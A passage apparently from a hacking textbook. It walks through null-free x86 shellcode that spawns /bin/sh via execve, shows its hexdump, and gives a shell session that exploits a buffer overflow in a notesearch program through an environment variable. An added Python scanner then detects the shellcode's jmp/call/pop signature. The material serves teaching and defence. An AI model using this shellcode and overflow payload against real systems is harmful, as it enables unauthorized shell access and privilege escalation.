exec_shell.s
BITS 32
jmp short two ; Jump down to the bottom for the call trick.
one:
; int execve(const char *filename, char *const argv [], char *const envp[])
pop ebx ; Ebx has the addr of the string.
xor eax, eax ; Put 0 into eax.
mov [ebx+7], al ; Null terminate the /bin/sh string.
mov [ebx+8], ebx ; Put addr from ebx where the AAAA is.
mov [ebx+12], eax ; Put 32-bit null terminator where the BBBB is.
lea ecx, [ebx+8] ; Load the address of [ebx+8] into ecx for argv ptr.
lea edx, [ebx+12] ; Edx = ebx + 12, which is the envp ptr.
mov al, 11 ; Syscall #11
int 0x80 ; Do it.
two:
call one ; Use a call to get string address.
db '/bin/sh' ; The XAAAABBBB bytes aren't needed.
After terminating the string and building the arrays, the shellcode uses
the lea instruction (lea ecx, [ebx+8] above) to put a pointer to the argument
array into the ECX register. Loading the effective address of a bracketed
register added to a value is an efficient way to add the value to the register
and store the result in another register. In the example above, the brackets
dereference EBX+8 as the argument to lea, which loads that address into ECX.
Loading the address of a dereferenced pointer produces the original pointer,
so this instruction puts EBX+8 into ECX. Normally, this would require both a
mov and an add instruction. When assembled, this shellcode is devoid of null
bytes. It will spawn a shell when used in an exploit.
reader@hacking:~/booksrc $ nasm exec_shell.s
reader@hacking:~/booksrc $ wc -c exec_shell
36 exec_shell
reader@hacking:~/booksrc $ hexdump -C exec_shell
00000000 eb 16 5b 31 c0 88 43 07 89 5b 08 89 43 0c 8d 4b |..[1..C..[..C..K|
00000010 08 8d 53 0c b0 0b cd 80 e8 e5 ff ff ff 2f 62 69 |..S........../bi|
00000020 6e 2f 73 68 |n/sh|
00000024
reader@hacking:~/booksrc $ export SHELLCODE=$(cat exec_shell)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9c0
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xc0\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]-------
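A defender reads the same 36 bytes from the other direction: a blob that contains no null bytes and carries the jmp/call/pop idiom the listing uses to find its own string is a classic shellcode signature. The following Python is an added example, not code from the book; it transcribes the bytes printed by the hexdump above into a constant and reports the null-byte check, the offsets of the jmp, call and pop, the register the pop lands in, and the inline string that follows the call.

```python
import struct

# The 36 bytes of exec_shell as printed by the hexdump above, transcribed
# into a constant so the checks below run offline.
EXEC_SHELL = bytes.fromhex(
    "eb 16 5b 31 c0 88 43 07 89 5b 08 89 43 0c 8d 4b "
    "08 8d 53 0c b0 0b cd 80 e8 e5 ff ff ff 2f 62 69 "
    "6e 2f 73 68"
)

# Single-byte pop opcodes 0x58..0x5f, indexed by register number.
POP_REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def null_byte_offsets(code):
    """Offsets of every 0x00 byte. Shellcode that travels through strcpy()
    or an environment variable must have none, which is why the listing
    uses xor eax, eax / mov al, 11 instead of mov eax, 11."""
    return [i for i, b in enumerate(code) if b == 0]


def find_jmp_call_pop(code):
    """Scan for the position-independent 'get string address' idiom used
    above: a short jmp forward (eb rel8) onto a call (e8 rel32) whose
    target is a single-byte pop (58..5f). Returns one dict per match with
    the offsets involved; the bytes right after the call are inline data."""
    hits = []
    for i in range(len(code) - 1):
        if code[i] != 0xEB:
            continue
        rel8 = struct.unpack_from("<b", code, i + 1)[0]
        call_at = i + 2 + rel8                      # jmp target
        if call_at < 0 or call_at + 5 > len(code) or code[call_at] != 0xE8:
            continue
        rel32 = struct.unpack_from("<i", code, call_at + 1)[0]
        pop_at = call_at + 5 + rel32                # call target
        if not 0 <= pop_at < len(code) or not 0x58 <= code[pop_at] <= 0x5F:
            continue
        hits.append({
            "jmp": i,
            "call": call_at,
            "pop": pop_at,
            "pop_reg": POP_REGS[code[pop_at] - 0x58],
            "data": call_at + 5,                    # return address the pop collects
        })
    return hits


def inline_string(code, hit):
    """The bytes whose address the call pushes: from just after the call
    to the first null byte or the end of the blob."""
    data = code[hit["data"]:]
    end = data.find(b"\x00")
    return data if end < 0 else data[:end]


def analyze(code):
    """Summarize the checks a triage script would log for a suspicious blob."""
    hits = find_jmp_call_pop(code)
    return {
        "length": len(code),
        "null_bytes": null_byte_offsets(code),
        "jmp_call_pop": hits,
        "strings": [inline_string(code, h) for h in hits],
    }


if __name__ == "__main__":
    report = analyze(EXEC_SHELL)
    print(f"{report['length']} bytes, null bytes at {report['null_bytes']}")
    for h, s in zip(report["jmp_call_pop"], report["strings"]):
        print(f"jmp@{h['jmp']:#04x} -> call@{h['call']:#04x} -> "
              f"pop {h['pop_reg']}@{h['pop']:#04x}; inline data {s!r}")
```

Run against the transcribed bytes, the scanner finds the jmp at offset 0 landing on the call at 0x18, whose negative displacement returns to the pop ebx at offset 2, and recovers /bin/sh as the inline string; a block of NOPs or a blob that uses mov eax, 11 is reported accordingly. The matcher only recognizes this exact short-jmp/rel32-call/pop shape, so it is a starting point for a signature rather than a general decoder.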